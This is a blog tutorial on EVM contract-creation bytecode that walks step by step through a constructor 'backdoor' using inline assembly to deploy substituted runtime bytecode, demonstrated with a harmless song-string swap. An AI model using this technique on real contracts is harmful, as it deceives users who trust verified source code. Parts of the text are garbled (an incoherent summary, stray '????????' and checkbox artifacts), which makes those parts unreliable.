How to Exploit a Solidity Constructor

Written by inaeem | Published 2021/11/12
Tech Story Tags: solidity | blockchain | ethereum | ethereum-virtual-machine | blockchain-development | blockchain-top-story | solidity-top-story | solidity-constructor

TLDRThe constructor has public visibility and doesn’t do anything. When we compile this contract, solidity compiler generates some gibberish characters (bytecode) The bytecode includes everything to successfully deploy/initialize the code, persists state and some sanity checks. It is never meant for EVM and isn't executed by the EVM. To create this contract on-chain, we execute a send transaction (RPC call) where the `“to”` address is null and the “data” `Auxdata` is the hash of the source code used for source verification.via the TL;DR App

Before we discuss the exploit, let’s quickly discuss how smart contracts are executed by EVM. Let’s start with the simplest possible smart contract where has a constructor with public visibility but doesn’t do anything.

// SPDX-License-Identifier: MIT

pragma solidity = 0.8.9;

contract Simple {
    constructor () public {}
}

Solidity's compiler (solc) throws gibberish characters as runtime code when we compile this contract.

// It will print the binary.
$ solc --bin Simple.sol
0x6080604052348015600f57600080fd5b50603580601d6000396000f3006080604052600080fd00
a165627a7a72305820a5212a0f267d8b353b5f25b37718d4894d57728a88e86f7079ffef9332d2be630029

How is a Contract Executed?

For the web3 client to create the on-chain contract, an RPC call is made. When the transaction executes on-chain, EVM initializes the memory/stack and bootstraps the environment. After the initialization, EVM stores the contract runtime bytecode in the virtual ROM and the contract code is executed instruction by instruction and when an error occurs during the execution of the code, EVM stops the execution and sends the issue to the execution environment.

{
  "from": "0xbd04d16f09506e80d1fd1fd8d0c79afa49bd9976",
  "to": null,
  "gas": "68653", // 30400,
  "gasPrice": "1", // 10000000000000
  "data": "0x60606040523415600e57600080fd5b603580601b6000396000f3006060604052600080fd00a165627a7a723058204bf1accefb2526a5077bcdfeaeb8020162814272245a9741cc2fddd89191af1c0029"
}

where

“to” address is null to indicate a contract deployment.

“data” includes everything to successfully deploy/initialize the code, persist state and some sanity checks.

What is that data bytecode? Let's dive into the data.

Init Code Fragments

It is responsible for bootstrapping and preparing a working environment for the contract. Solidity compiler prepends bootstrapping logic to the runtime bytecode.

Parameters

A web3 transaction puts parameters at the end of the contract. CodeCOPY is used by EVM to copy parameters into memory. They can be put onto the stack and commits to the state storage with the help of the constructor.

The end of the creation bytecode has arguments appended to it. It wasn't supposed to be executed by the EVM. It was a sort of hack to store the values of the contract for consumption in the constructor.

Constructors

The code in the constructor will only be called once, only when the contract is created.

For initializing state variables, constructors should be used, and long Solidity code should be avoided in general.

Runtime ByteCode

It doesn't contain init logic and input parameters of a constructor and only represents the core function of a contract stored on chain. It also contains a routine to dispatch the call to the function based on the function's hashes.

function hashes is first 4 bytes of the keccak256 value of function’s signature

keccak256(“test() public returns (string memory)“) ????????

Auxdata ByteCode (optional)

Auxdata is the source code hash, used for source checking on a distributed storage system such as IPFS and Swarm. It is never designed for the EVM, nor is it executed by the EVM.

Applications such as Etherscan or the web3 wallet recognize Auxdata and know where to look for contract metadata for source verification.

So how can I read Auxdata. Use the form below.

0xa1 0x65 <storage system> '0' 0x58 0x20 <32 bytes storage system hash> 0x00 0x29

a165627a7a723058204bf1accefb2526a5077bcdfeaeb8020162814272245a9741cc2fddd89191af1c0029
| | | | | | | | | |                                                               | 
| | | | | | | | | |                                                               Length of previous part in bytes 
| | | | | | | | | <32 bytes swarm storage system hash>                                                                
| | | | | | | | SHA3 (keccak256)                                                                 
| | | | | | | 0x58                                                                  
| | | | | | '0'                                                                   
| | | | | 'r'                                                                    
| | | | 'z'                                                                     
| | | 'z'                                                                      
| | 'b'                                                                       
| PUSH6                                                                     
LOG1

How Does the Exploit Work?

Whether you call it Backdoor Technique or Honeypot Hack, the idea here is to cheat EVM by loading a modified implementation of a contract during the contract creation phase.

We need to recall few key concepts

1- An actual representation of a contract is found in “Runtime ByteCode” which represents dispatch routine, function body wrappers, functions implementation etc.

It will be executed whenever someone or something has an interaction with the contract.

2- Some of the key events in the course of bootstrapping contract are.

  • Copy big chunk of the code to memory (CODECOPY).
  • Set up a memory layout in which the smart contract is stored.
  • Return the runtime code of the created contract’s that is stored in the state trie.
  • Stop executing the creation of the contract.

3- We know that when a web3 client initiates a transaction (RPC call) to create a contract, the client appends constructor arguments to the end of the code as raw hex data.

4- Another important feature is that Solidity supports inline assembly, which enables low-level operations (EVM dialect) that are not supported or allowed by the Solidity language.

5- One low level built-in operation is return that quits the execution context (internal message call) and returns the size and offset in the data area (memory) to the caller.

Now let’s discuss how this exploit works?

  • First carefully prepare a Runtime ByteCode which represents an altered version of a contract.
  • Calculate the number of bytes of altered bytecode.
  • Determine where in memory the target contract loads the argument.
  • Load the altered bytecode into target contract’s memory space as Constructor Argument
  • Instruct EVM to ignore the compiled bytecode and use in-line assembly to return the modified bytecode memory range as the contract's Runtime ByteCode.

Demonstrate It Please.

Consider a contract that is supposed to sing "It's a Wonderful World!" but may instead sing "The Times They Are a Changin!"

// SPDX-License-Identifier: MIT
pragma solidity = 0.8.9;

contract ContractA {
    constructor (bytes memory a) public {

        /*
           The Values to return opcode can come from a complex logic 
           but to keep it simple and for demo, we have hard coded them. 
           It may be different in your case. 
        */

        assembly{
            return (0xc0, 0x17c)
        }
    }

    function sing() public returns (string memory) {
        return "It's a Wonderful World!";
    }
}

Step #1: Prepare An Altered Runtime ByteCode

Implement a slightly different version of "ContractA."

// SPDX-License-Identifier: MIT
pragma solidity = 0.8.9;

contract AlteredContractA {    
    function sing() public returns (string memory) {
        return "The Times They Are a Changin!";
    }
} 

Deploy the contract using Remix first, then debug to observe what is loaded into memory at 0x30 RETURN. Now copy the hex values that correspond to the runtime bytecode.

/*
608060405234801561001057600080fd5b50600436106100
2b5760003560e01c8063b4ba349f14610030575b600080fd
5b61003861004e565b6040516100459190610124565b6040
5180910390f35b60606040518060400160405280601d8152
6020017f5468652054696d65732054686579204172652061
204368616e67696e21000000815250905090565b60008151
9050919050565b600082825260208201905092915050565b
60005b838110156100c55780820151818401526020810190
506100aa565b838111156100d4576000848401525b505050
50565b6000601f19601f8301169050919050565b60006100
f68261008b565b6101008185610096565b93506101108185
602086016100a7565b610119816100da565b840191505092
915050565b6000602082019050818103600083015261013e
81846100eb565b90509291505056fea26469706673582212
206f52e317773c0063a5888d204277821aaf1a0ef4c6baac
8a6ec76ef3673e589a64736f6c6343000809003300000000
*/

Step #2: Determine The Length Of Runtime ByteCode

We are interested in the Stack Section at 0x30 RETURN because it represents the memory range reserved for runtime bytecode.

First Index: Lower bound of the memory range.

Second Index: Length of the runtime bytecode (0x17c).

Step #3: Deploy The Target Contract

Debug the transaction after deploying the target contract "ContractA" with an arbitrary parameter 0x1414141414.

// SPDX-License-Identifier: MIT
pragma solidity = 0.8.9;

contract ContractA {
    constructor (bytes memory a) public {
    }
    
    function sing() public returns (string memory) {
        return "It's a Wonderful World!";
    }
} 

EMV will load the parameter into memory at some point during the bootstrapping process. We must keep track of where it is loaded into memory.

It's at 0xc0 in our case.

Now, add some inline assembly code to the constructor.

  • [ ]undefined0xc0 as lower bound.
  • [ ]undefined0x17c as length of runtime bytecode.

// SPDX-License-Identifier: MIT
pragma solidity = 0.8.9;

contract ContractA {
    constructor (bytes memory a) public {
        assembly{
            return (0xc0, 0x17c)
        }
    }
    
    function sing() public returns (string memory) {
        return "It's a Wonderful World!";
    }
} 

Step #4: Re-Deploy The Target Contract

Now, re-deploy ContractA with the following modification.

  • [ ]inline assembly to return runtime bytecode for a specified memory region (0xc0, 0x17c).
  • [ ]As an argument to the constructor, pass the updated runtime bytecode from Step #4.
0x608060405234801561001057600080fd5b50600436106100
2b5760003560e01c8063b4ba349f14610030575b600080fd
5b61003861004e565b6040516100459190610124565b6040
5180910390f35b60606040518060400160405280601d8152
6020017f5468652054696d65732054686579204172652061
204368616e67696e21000000815250905090565b60008151
9050919050565b600082825260208201905092915050565b
60005b838110156100c55780820151818401526020810190
506100aa565b838111156100d4576000848401525b505050
50565b6000601f19601f8301169050919050565b60006100
f68261008b565b6101008185610096565b93506101108185
602086016100a7565b610119816100da565b840191505092
915050565b6000602082019050818103600083015261013e
81846100eb565b90509291505056fea26469706673582212
206f52e317773c0063a5888d204277821aaf1a0ef4c6baac
8a6ec76ef3673e589a64736f6c6343000809003300000000

Step #5: Invoke Sing Of The Target Contract

When you invoke Sing on the target contract, you will hear it sing "The Times They Are a Changin!"

{
	"0": "string: The Times They Are a Changin!"
}


Written by inaeem | live @ PID 1
Published by HackerNoon on 2021/11/12